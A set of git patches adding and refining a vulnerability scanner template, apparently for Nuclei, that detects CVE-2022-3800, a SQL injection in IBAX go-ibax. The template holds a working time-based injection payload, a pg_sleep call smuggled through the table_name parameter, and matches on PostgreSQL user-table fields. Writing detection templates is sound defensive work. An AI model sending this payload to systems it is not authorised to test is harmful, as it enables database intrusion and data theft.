From a5ffcef441bf9f647e35fc0974f37704e10f74ba Mon Sep 17 00:00:00 2001
From: Jon Cagan <joncagan@ymail.com>
Date: Sun, 19 Feb 2023 14:36:38 -0500
Subject: [PATCH 1/4] Added CVE-2022-3800 Template

---
 cves/2022/CVE-2022-3800.yaml | 47 ++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 cves/2022/CVE-2022-3800.yaml

diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml
new file mode 100644
index 0000000000..67bf3e4be5
--- /dev/null
+++ b/cves/2022/CVE-2022-3800.yaml
@@ -0,0 +1,47 @@
+id: go-ibax-sqli
+
+info:
+  name: IBAX go-ibax - SQL Injection
+  author: JC175
+  severity: high
+  description: |
+    IBAX go-ibax contains a SQL injection vulnerability via the table_name parameter. An attacker can spoof identity, tamper with or view existing data, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects versions starting from commits on Jul 18, 2020 until Dec 2, 2022.
+  reference:
+    - https://github.com/IBAX-io/go-ibax/issues/2061
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-3800
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+  tags: cve,cve2022,IBAX,go-ibax,sqli
+
+requests:
+  - raw:
+      - |
+        POST /api/v2/open/rowsInfo HTTP/2
+        Host: {{Hostname}}
+        User-Agent: {{header}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 71
+        order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1
+    matchers-condition: and
+    matchers:
+    
+      - type: status
+        status:
+          - 200
+          
+      - type: word
+        part: header
+        words:
+          - "Content-Type: application/json"
+          
+      - type: word
+        part: body
+        words:
+          - '"passwd":'
+          - '"usename":'
+          - '"usesysid":'
\ No newline at end of file

From a26ce9f9f28b33333610a0365c4d393ae1660f67 Mon Sep 17 00:00:00 2001
From: Jon Cagan <joncagan@ymail.com>
Date: Mon, 20 Feb 2023 11:12:58 -0500
Subject: [PATCH 2/4] Removed trailing spaces and added ending newline.

---
 cves/2022/CVE-2022-3800.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml
index 67bf3e4be5..b3922fc10d 100644
--- a/cves/2022/CVE-2022-3800.yaml
+++ b/cves/2022/CVE-2022-3800.yaml
@@ -29,19 +29,19 @@ requests:
         order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1
     matchers-condition: and
     matchers:
-    
+
       - type: status
         status:
           - 200
-          
+
       - type: word
         part: header
         words:
           - "Content-Type: application/json"
-          
+
       - type: word
         part: body
         words:
           - '"passwd":'
           - '"usename":'
-          - '"usesysid":'
\ No newline at end of file
+          - '"usesysid":'

From 1cd2fa2d1d1b19ad166fe376a2f7dde4f68b13ac Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 20 Mar 2023 13:54:18 +0530
Subject: [PATCH 3/4] fix formatting

---
 cves/2022/CVE-2022-3800.yaml | 41 +++++++++++++-----------------------
 1 file changed, 15 insertions(+), 26 deletions(-)

diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml
index b3922fc10d..2eb2bfbd3d 100644
--- a/cves/2022/CVE-2022-3800.yaml
+++ b/cves/2022/CVE-2022-3800.yaml
@@ -1,47 +1,36 @@
-id: go-ibax-sqli
+id: CVE-2022-3800
 
 info:
   name: IBAX go-ibax - SQL Injection
   author: JC175
   severity: high
   description: |
-    IBAX go-ibax contains a SQL injection vulnerability via the table_name parameter. An attacker can spoof identity, tamper with or view existing data, destroy the data or make it otherwise unavailable, and become administrators of the database server. This issue affects versions starting from commits on Jul 18, 2020 until Dec 2, 2022.
+    A vulnerability, which was classified as critical, has been found in IBAX go-ibax. Affected by this issue is some unknown functionality of the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used
   reference:
     - https://github.com/IBAX-io/go-ibax/issues/2061
     - https://nvd.nist.gov/vuln/detail/CVE-2022-3800
+    - https://vuldb.com/?id.212636
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cwe-id: CWE-89
-  metadata:
-    verified: true
-  tags: cve,cve2022,IBAX,go-ibax,sqli
+  tags: cve,cve2022,ibax,go-ibax,sqli
 
 requests:
   - raw:
       - |
-        POST /api/v2/open/rowsInfo HTTP/2
+        POST /api/v2/open/rowsInfo HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: {{header}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 71
-        order=1&table_name=pg_user"%3b+select+pg_sleep(1)%3b+--"&limit=1&page=1
-    matchers-condition: and
+
+        order=1&table_name=pg_user"%3b+select+pg_sleep(6)%3b+--"&limit=1&page=1
+
     matchers:
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: header
-        words:
-          - "Content-Type: application/json"
-
-      - type: word
-        part: body
-        words:
-          - '"passwd":'
-          - '"usename":'
-          - '"usesysid":'
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "usesysid")'
+        condition: and

From 7951575c74aad902678225d43374d5c18bb13152 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 22 Mar 2023 16:56:52 +0530
Subject: [PATCH 4/4] added timeout

added a timeout just in case.
---
 cves/2022/CVE-2022-3800.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-3800.yaml b/cves/2022/CVE-2022-3800.yaml
index 2eb2bfbd3d..59870c62ed 100644
--- a/cves/2022/CVE-2022-3800.yaml
+++ b/cves/2022/CVE-2022-3800.yaml
@@ -12,6 +12,7 @@ info:
     - https://vuldb.com/?id.212636
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cve-id: CVE-2022-3800
     cvss-score: 8.8
     cwe-id: CWE-89
   tags: cve,cve2022,ibax,go-ibax,sqli
@@ -19,9 +20,9 @@ info:
 requests:
   - raw:
       - |
+        @timeout: 15s
         POST /api/v2/open/rowsInfo HTTP/1.1
         Host: {{Hostname}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Content-Type: application/x-www-form-urlencoded
 
         order=1&table_name=pg_user"%3b+select+pg_sleep(6)%3b+--"&limit=1&page=1